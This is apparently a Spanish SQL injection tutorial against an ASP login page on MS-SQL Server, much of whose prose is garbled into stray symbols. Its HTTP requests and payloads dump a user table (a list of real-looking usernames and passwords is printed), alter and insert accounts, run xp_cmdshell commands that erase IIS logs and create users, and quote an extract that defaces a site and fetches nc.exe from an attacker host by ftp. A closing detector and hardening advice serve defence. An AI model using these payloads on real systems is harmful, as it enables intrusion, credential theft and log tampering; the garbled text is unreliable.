#S#:-b8';# + #S#':% 1# " > ,> * 9
" ) " 6 (
" ;:! E8 " " F % " " " (
1 6 9 " " 6 " #8%8';
7 " "& "= * 9 ) 6 " "
B

4 ;:!& " 9 . " "


;:,:# " " ) )4 6 "
!:#; 6 ;:! F

% " 9 = " ) " " " . " "


" &

Ups' union select b.name,1,1,1 from sysobjects a, syscolumns b where a.id=b.id and a.name='usuarios' and b.colorder = 48 --

7 " & 4 " 4 " +J . "


" " E! 4 9 " " " " ") (
" > >F

! 6 " " " 7 " 4

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UserSubPLUSDate' to a column of data type int.
/Login.asp, line 85

:M& 6 " :,-' " " 9 )


) # 5 :# " > " # )!% #, > % . " &
6 ". ;:! + " . " " " "
) "+ "

:- .# ! #& +

5 ) & &+ " 6 ( 9 " "


". 6 " & ) " " ) " ) + "
"& " 9 )7 " " 6. " 9
" " % . " & " " " #$% > 1 :1>&
D * ># EF> "

# ) " 1 :1 " " " " >) " "> 9 " *


. 4 #$%& " 9 " J " * "& " ) "
J 6 " ) " " ! 4 & " " J
1 :1& " " " > >& )
" " " " " ) " "

! " * # EF& " ) " 7 " .


" "
C

5 9 " " . ) " " 6 " "


( "4 "& & " +

; " " 6 " 4 < + 7 " * 9


. ". "

POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 82
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina

txtUsuario=%27+union+select+sum(UID)%2C1%2C1%2C1+from+usuarios--&txtPassword=Angel
Y Y
Y H 9 6 " >! "" >
Y * . "
Y
H + L " " E ,F& & & * " "00

6 ( "& . 4 " " = 1


6 !:#; " " 6 )4 6 & ) " "
". <

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a nvarchar data type as an argument.
/Login.asp, line 85

- " " 6 9 6 :,-' " "


) " " & 4 6 "
" E> ,> " 4 F " " ) 9 "
I8 " 9 " " " " 1:& 6 ( " "
& " 6 " " 9 = "

, ) 9 " " " " " )


) ( & "= & + )
2

" " 6 "& " ) * " (


" " #$% ) " " ) " E! " " " )4 6
#$%KK& IIF

8 "& " " " " " " &


" " " " "" #$% 1 :1& 9 4
" # + " " " & "
) ) " ( & ; !: ,8 ,5;: 9
" " "9 ". " "

! " " . &9 " 9 " " " + I


:M& < ' " 5 + " < =" >5 6 #$%
4 ` a>& #$% ># > 6
* & 6 " " & #$% " <
* " " 4 " 9 " " " " " " "
" " " 4 " * 9 " 4 " +
> ,>

8" " 4 " 4 6 9 " " 1H5 ' 5 EA ""


" " F " 6 #$% " " >9 4 > 7 " 9
. # 1H5 ' 5

- . " & " 6" 6 7 " . " " " +


"" "& " . ) ) " "
#$% ! . * & )" 6 " 9 " 6

1 &( ! (! " " " ! <1


# 5 :# " " " ! M
" " " %"# "
4 # # " " " ,
" " " # )!% #, " " " , M
" " " ." , " " , E1 ) " F
" " " ! ) ! * " " #
" " " ! * M " " !G# E' " D F
" " " ! * " 8
" " " ! <# "

' 6 &" * * " ( " )


"& " + " " " "& . " " "
6 " < " ! & " > .
" D > > . > " E! .J F 9 "
& " " "& " " ) " 9 " .
" " " ) " ) " " " " ) "& + " "
" 6" " > >& 9 ;:,5 * *
6 " )4 6 & b 1;5 >86 "&
, " ) +8 > . " "" " 4
. " , & " & E% " 9
) 9 F . . 9 " +
" "
2

4; ! * #! ! !< !& ! (!
6 ( #$%& (
" " " . " * ) "
" )4 6 & ( . " " 7 " 9 " ) "

= (! , 8 .=
# . "& >) " > ) " " "
. & " "9 6 ) "
" " A=4 " 9 * . " ) *
* 4 . " " "" ) " " 6 &
( 7 " " " "

> $6 3 / (! 6#; !

% " " " & " ( *


#$% . ) " 6 " 1;: 9 " .
" ." E% 9 " * 6 " 6" ( F *
* "6 " " " , + !G#

H 6 " " " F+6 " * 9 ) =


6 !:#; +

POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina

txtUsuario=%27+declare+@aux+varchar%288000%29+set+@aux%3D%27%27+select+@aux%3D@aux+%2B+UID%2B%27/%27%2BPWS%2B%27%3B%27+from+usuarios+where+UID%3E@aux+select+@aux+as+aux+into+xtmp--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
2

H + L <6 EB F" <VLL "


<V <[ [L L[ "[L]L* " " U <" < " <
< W

-> $6 3 , 8 . ! (! 6#; !

6 ( " " & " ) " +


#8%8'; ) ( 7
" "

POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 76
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina

txtUsuario=Ups%27union+select+aux%2C1%2C1%2C1+from+xtmp--&txtPassword=Angel
Y Y
H 9 6 " Y
>! "" > * Y
. " Y

H + "L " <& & & * < 00

) ( " !:#; * & 6 :,-' 6 6


" " ) " 4 " * .) " .
* * " " "

Login de Usuarios Registrados


Microsoft OLE DB Provider for ODBC Drivers error
'80040e07'[Microsoft][ODBC SQL Server Driver][SQL
Server]Syntax error converting the varchar value
'Danyr2/pepe;THEMA/M1703;CIELORIANO/daniel;ALELARRAINP/14
05;SANDRA/4484188;0001/13119695;AsdrubalCh/1173;beatrizay
ala/10338154;maria_perez/12345;batv/peresosita;susy/susyk
a;Mireya_Salazar/gabriela;MVidales/male;AngelicaS/chainy;
carla/cardie;MonicaA/amorcito;aliciafalcon/baby;dayana/ne
ne;Luz_d/carmen;mguevara/martha;Tiatere1/lima27;CMorena/2
11095;victor...
/Login.asp, line 85

2> $6 3 4! & ! (! 6#; !

6 ( ) " " ") " "& )


( " & " . +
, :!& " " ". 4

POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 53
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina

txtUsuario=%27%3Bdrop+table+xtmp--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > * . "
Y
H + L] ) < 00

- 6! !
; " " "" " " " " . &" " "
" 6 " " " . 6 ) " """ "&
"& 9 ( 6 "9 . * &
" " 5 " " " "
") " "9 " * & . .
." " " ) " "

$+6 4

H " 4 9 " " " !:#; (


"" " . "" 6= + "
!,5;8
23

POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 103
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina

txtUsuario=%27%3Bupdate+usuarios+set+pws%3D%27NuevoPass%27+where+uid%3D%27Carla%27--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
H + L " "" "VL1 6 ! ""L VL' L00

+4 4 4

# & . " * " !:#; & . "


+ 9 E5 9 " *
9 " " #$% # 6 F ."

H + 'delete from usuarios where UID='Usuario'--

1 4

$ " 1#8 ;& ) "9 " "


4 & " " 9 &
" " " "& " " 6 " 6 " "
" " 9 + . " " " !
& " " ) ( . & +
4 " & . " E' " 4
KKKF " = " ) " . 9 =
9 "" ( " 7 & 6 "
" " "& + . ( 9 " "
")
2?

5"= " & " 9 <" " " " 1#8 ; "
" 9 " ) " & 4 * " + &
". = 9 " " " "
( " !:#; 6= :)6 7< " +
. * 9 " + . &
" ) " " " "+" " " 6 " "

POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 113
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina

txtUsuario=%27%3Binsert+into+usuarios+values+%28%27MyUser%27%2C%27MyPassword%27%29--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
H + L] " " "6 " EL + " L&L +! "" LF00

% & & ! !
" . " . " ! " )
( . " 7 "" " #$% 4 " " "(
" " " * " * &
) " 6" II * 6 1: " " .
& " "* "9 " * #$% # 6
" >8< # ! "> "
< "

$ # ?4; $ #
% " " < " " " & ,%%L" 9 < " "
) " " " " & " "
" " 8< " " " " < "&
6 " #0#$%& " ") *
" 5 . " "& #0#$% ) ") .
2@

" " " < " "& "


" & * " ) ) " " " 9 "

5 ) " * " "& " " " " "


" "" " " "9 " + " (
" " " < Q "

N Q " " 4 " "" 6 6= #$%


> "> " K6 " ( = " " " ". "
4 " " ;;!

POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 90
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina

txtUsuario=Ups%27%3BEXEC+master.dbo.xp_cmdshell%27cmd.exe+dir+c%3A%27--&txtPassword=Angel
Decoded, the injected value is:

Ups';EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'--

Note that xp_cmdshell already hands its argument to cmd.exe, so 'dir c:' alone is enough; a cmd.exe without /c ignores the rest of the line and starts an interactive shell that never returns.

Whether this works depends on the account the application uses to connect. If it is sa (or any other login allowed to execute xp_cmdshell), the attacker now runs arbitrary commands on the database server with the privileges of the SQL Server service account. Some of what can be done from there:
List the web root:
EXEC master..xp_cmdshell 'dir c:\inetpub\wwwroot\'

Read the source of a page:
EXEC master..xp_cmdshell 'type c:\inetpub\wwwroot\alguna_pagina.asp'

Copy cmd.exe into the web root, where it can be reached through the web server:
EXEC master..xp_cmdshell 'copy c:\winnt\system32\cmd.exe c:\inetpub\wwwroot\chroot.exe'

Find and erase the IIS logs (stop the World Wide Web Publishing Service, delete the log file, start the service again):
EXEC master..xp_cmdshell 'DIR c:\winnt\system32\logfiles\w3svc1\'
EXEC master..xp_cmdshell 'NET STOP "Servicio de publicación en World Wide Web"'
EXEC master..xp_cmdshell 'del c:\winnt\system32\logfiles\w3svc1\filelog.log'
EXEC master..xp_cmdshell 'NET START "Servicio de publicación en World Wide Web"'

Share a drive on the network:
EXEC master..xp_cmdshell 'NET SHARE nombre=drive:path'

Change a local account's password (with /ADD appended, create the account instead):
EXEC master..xp_cmdshell 'NET USER username password'
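As an added example, not part of the original document: a small detector that URL-decodes captured form bodies and flags the patterns used in this section (a quote followed by a semicolon and a new statement, the -- terminator, xp_cmdshell, the sp_OA* procedures, sp_addlogin, and master.. references). The three attack bodies are the document's own requests; the benign ones are constructed. It assumes the bodies were captured by something the attacker cannot reach, such as a reverse proxy or the application's own log: IIS W3C logs record the query string but not POST bodies, and the commands above show the w3svc1 logs being erased anyway.

```python
"""Flag MS-SQL stacked-query / xp_cmdshell injection in captured form bodies.

Added example, not from the original document. Attack bodies are the
document's requests; benign bodies and the rule set are constructed here.
"""
import re
from urllib.parse import unquote_plus

SAMPLES = [
    ("update", "txtUsuario=%27%3Bupdate+usuarios+set+pws%3D%27NuevoPass%27"
               "+where+uid%3D%27Carla%27--&txtPassword=Angel"),
    ("insert", "txtUsuario=%27%3Binsert+into+usuarios+values+%28%27MyUser"
               "%27%2C%27MyPassword%27%29--&txtPassword=Angel"),
    ("cmdshell", "txtUsuario=Ups%27%3BEXEC+master.dbo.xp_cmdshell%27cmd.exe"
                 "+dir+c%3A%27--&txtPassword=Angel"),
    ("benign", "txtUsuario=Carla&txtPassword=Angel"),              # constructed
    ("apostrophe", "txtUsuario=O%27Brien&txtPassword=semi%3Bcolon"),  # constructed
]

# (rule name, regex applied to the decoded, lowercased, space-collapsed value)
RULES = [
    ("stacked-statement",
     re.compile(r"'\s*;\s*(select|insert|update|delete|exec(ute)?|declare)\b")),
    ("comment-terminator", re.compile(r"--\s*$")),
    ("xp_cmdshell", re.compile(r"\bxp_cmdshell\b")),
    ("ole-automation",
     re.compile(r"\bsp_oa(create|method|getproperty|setproperty)\b")),
    ("login-creation", re.compile(r"\bsp_addlogin\b|\bsp_addsrvrolemember\b")),
    ("master-db-reference", re.compile(r"\bmaster\.(\.|dbo\.)")),
]


def decode_fields(body):
    """Split a urlencoded body into decoded (name, value) pairs.

    Each value is decoded exactly once: decoding twice is a classic way to
    both miss real payloads and invent false ones.
    """
    fields = []
    for part in body.split("&"):
        name, _, value = part.partition("=")
        fields.append((unquote_plus(name), unquote_plus(value)))
    return fields


def scan_body(body):
    """Return sorted (field, rule) hits for one request body."""
    hits = set()
    for name, value in decode_fields(body):
        text = re.sub(r"\s+", " ", value.lower())
        for rule, pattern in RULES:
            if pattern.search(text):
                hits.add((name, rule))
    return sorted(hits)


def scan_all(samples):
    """Map each sample label to its hits."""
    return {label: scan_body(body) for label, body in samples}


if __name__ == "__main__":
    for label, hits in scan_all(SAMPLES).items():
        print(f"{label:11} {'ALERT' if hits else 'ok   '} {hits}")
```

The apostrophe sample matters: a lone quote (O'Brien) or a lone semicolon in a password is normal input and must not page anyone, which is why the stacked-statement rule requires the quote, the semicolon and a statement keyword together.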

Besides the extended stored procedures, the ordinary system stored procedures of MS-SQL Server are reachable the same way. sp_addlogin, for instance, creates a new SQL Server login the attacker can come back with later:

'exec master..sp_addlogin MyUser, MyPass

The extract below, reproduced from another text, takes this further: with the OLE Automation procedures sp_OACreate and sp_OAMethod it writes a file into the web root straight from T-SQL, and then pulls tools onto the server with ftp or tftp launched through xp_cmdshell.

----- Extract ------------------------------------------

[...] The idea is to create an html or asp page, if a webserver is active and running on the target site [...]
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\web-hosting\attajdid\index3.html', 1
exec @ret=sp_oamethod @f, 'writeline', NULL, '<HTML> <HEAD><TITLE>Hola Mundo!!!</TITLE> </HEAD> <BODY text=black bgColor=#000000> <CENTER> <P><B>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<FONT face=Arial color=#b4b58c size=7>Vosotros </B>Perejil...</B></FONT></P></CENTER> <P><BR><BR>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<!--" "--></P> <P></P> <CENTER> <P><B><FONT face=Arial color=#b4b58c size=7>'
exec @ret=sp_oamethod @f, 'writeline', NULL, 'nosotros vuestras </B>WEB<B>s!!!</B></FONT></P></CENTER> <P><BR><BR></P>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<DIV align=center> <CENTER> <TABLE cellSpacing=0 cellPadding=0 width=100 border=0>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<TBODY> <TR> <TD bgColor=#d20000>&nbsp;</TD></TR> <TR> <TD align=middle bgColor=#ffff00>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<FONT color=#ffff00 size=1>¡ORTO!<BR>¡¡¡Va por vosotros!!! </FONT></TD></TR> <TR> <TD '
exec @ret=sp_oamethod @f, 'writeline', NULL, 'bgColor=#d20000>&nbsp;</TD></TR><!--" "--></TBODY></TABLE></CENTER></DIV> '
exec @ret=sp_oamethod @f, 'writeline', NULL, '<P><BR><BR><BR><BR><BR></P>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<P align=right> <FONT face="Courier New" color=#00ff00 size=5> lagear & runlevel</FONT></P>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<P align=right> <FONT face="Courier New" color=#00ff00 size=4>Recuerdos a <B>N</B>9<B>Team</B></FONT>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '</P> <P align=right> <FONT face="Courier New" color=#00ff00 size=3>'
exec @ret=sp_oamethod @f, 'writeline', NULL, 'Donde te podemos encontrar BreakICE?</FONT></P> <FONT color=black>" </FONT> </BODY></HTML>'

To upload files: we create a get.txt file and then use ftp with it
declare @o int, @f int, @t int, @ret int
EXECUTE sp_oacreate 'scripting.filesystemobject', @o out
EXECUTE sp_oamethod @o, 'createtextfile', @f out, 'c:\get.txt', 1
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'user anonymous'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'get nc.exe'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'quit'
EXECUTE master..xp_cmdshell 'FTP -s:c:\get.txt NUESTROHOST'

or, easier, if we have a tftp server on our host
EXECUTE master..xp_cmdshell 'TFTP -i NUESTROHOST GET c:\mi_local_file c:\remote_file'

----- Extract ------------------------------------------

sp_OACreate and sp_OAMethod are the OLE Automation stored procedures of MS-SQL Server. They let T-SQL instantiate any COM object registered on the server (Scripting.FileSystemObject in the extract) and call its methods, which is how the file reaches the disk without going through xp_cmdshell. Their syntax:

sp_OACreate progid, objecttoken OUTPUT [, context]

sp_OAMethod objecttoken, methodname [, returnvalue OUTPUT] [, [@parametername =] parameter [OUTPUT] [...n]]

The techniques above are not specific to MS-SQL Server. Other engines differ in the details that decide which steps carry over: whether subselects are supported, whether UNION can be used to read from other tables, whether stored procedures exist, which comment syntax ends the statement, and whether there is a way to write files to disk (MySQL's SELECT ... INTO OUTFILE, PostgreSQL's COPY). The engine behind the application determines how far an injection can be taken.

Recommendations

Keep MS-SQL Server at the current Service Pack.
Do not expose the server's ports (TCP 1433 and UDP 1434) beyond the hosts that need them.
Make sure sa has a password, and do not connect the application as sa: use an account with the minimum rights the application needs.
Remove or restrict the extended stored procedures exercised above (xp_cmdshell, the sp_OA* procedures) where the application does not need them.


